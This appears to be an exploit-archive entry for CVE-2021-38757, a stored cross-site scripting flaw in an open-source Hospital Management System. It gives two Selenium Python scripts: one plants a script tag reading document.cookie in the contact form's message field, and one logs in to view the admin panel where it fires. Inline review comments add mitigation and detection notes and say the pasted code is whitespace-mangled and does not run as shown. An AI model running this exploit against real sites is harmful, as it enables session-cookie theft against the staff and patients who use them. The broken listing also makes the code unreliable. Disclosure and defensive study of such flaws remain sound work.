# Exploit Title: Stored XSS (PHPSESSID disclosure, user PWNED) in Hospital Management System - vulnerable parameter "txtMsg" on the contact form
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 08.17.2021
# Vendor: https://github.com/kishan0725/Hospital-Management-System
# Link: https://github.com/kishan0725/Hospital-Management-System
# CVE: CVE-2021-38757
[+] Exploit Source:
### P0C
#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Development: @nu11secur1ty
# CVE-2021-38757
#
# PoC driver: opens the contact page of the target in a Chrome session,
# fills the form through injected JavaScript, submits it, and then spawns
# the separate check script (the second listing on this page).
#
# NOTE(review): this listing is a whitespace-mangled paste -- the body of
# the `try:` block is not indented and two string literals are split across
# lines, so the script does not run as shown.
from selenium import webdriver
import time  # imported but not used in this script
import os
# Target contact page; the host is a private-range (192.168.x.x) address.
website_link="
http://192.168.1.3/Hospital-Management-System-master/contact.html"
browser = webdriver.Chrome()
browser.get((website_link))
try:
## The Exploit
# Form fields are set by assigning .value via execute_script rather than
# with send_keys(); the selectors are the input "name" attributes.
browser.execute_script("document.querySelector('[name=\"txtName\"]').value=\"User\"")
browser.execute_script("document.querySelector('[name=\"txtEmail\"]').value=\"
taratora@abv.bg\"")
browser.execute_script("document.querySelector('[name=\"txtPhone\"]').value=\"1234567890\"")
# Duplicate of the previous line; redundant but harmless.
browser.execute_script("document.querySelector('[name=\"txtPhone\"]').value=\"1234567890\"")
# The stored payload: a <script> tag inside the "txtMsg" message field. The
# check script later opens admin-panel1.php, so presumably the message is
# rendered there unescaped -- confirm against the vulnerable page source.
# Mitigation: HTML-encode txtMsg on output (e.g. htmlspecialchars in PHP) and
# mark the session cookie HttpOnly so document.cookie cannot read it.
# Detection: contact messages containing "<script" or other markup in txtMsg
# are a direct indicator in the application database or request logs.
browser.execute_script("document.querySelector('[name=\"txtMsg\"]').value=\"nu11secur1ty<script>alert(document.cookie)</script>\"")
## submit the exploit
browser.execute_script("document.querySelector('[name=\"btnSubmit\"]').click()")
# Check
# Spawns the check script (second listing on this page) through the shell;
# the fixed command string is not built from any input.
os.system("python PoC-CVE-2021-38757-Check.py")
print("The payload for CVE CVE-2021-38757 is deployed...\n")
except Exception:
#### Reached when a form element is not found in the page -- or on any other
#### exception, since this catch-all discards the actual cause.
print("Some error occured :(")
### Ch3ck
#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Development: @nu11secur1ty
# CVE-2021-38757
#
# Check script: logs in to the target's index1.php with the credentials
# below, waits briefly, then opens admin-panel1.php so the effect of the
# stored payload submitted by the PoC script can be observed in the browser.
#
# NOTE(review): as with the PoC listing, the `try:` body is unindented and
# two URL literals are split across lines, so this does not run as pasted.
from selenium import webdriver
import time
# Login page; the host is a private-range (192.168.x.x) address.
website_link="
http://192.168.1.3/Hospital-Management-System-master/index1.php"
# Credentials typed into the login form (account role is not shown here).
username="tarator@abv.bg"
password="password"
# "name" attributes of the login form's inputs and submit button.
element_for_username="email"
element_for_password="password2"
element_for_submit="patsub"
browser = webdriver.Chrome()
browser.get((website_link))
try:
# Fill the login form with send_keys() on the located elements.
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Check
# Fixed 3 s wait for the post-login redirect; there is no explicit wait on
# a page element, so a slow target may race this.
time.sleep(3)
browser.maximize_window()
# Open the admin panel in the now-authenticated session; this is presumably
# where the stored "txtMsg" content is displayed and the script runs with
# that user's cookies -- confirm against the page source.
browser.get(("
http://192.168.1.3/Hospital-Management-System-master/admin-panel1.php#"))
print("The payload for CVE CVE-2021-38757 is deployed...\n")
except Exception:
#### Reached when a login element is not found in the page -- or on any other
#### exception, since this catch-all discards the actual cause.
print("Some error occured :(")
----------------------------------------------------------------------------------------
# Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38757
# Proof: https://streamable.com/6xue3b
# BR nu11secur1ty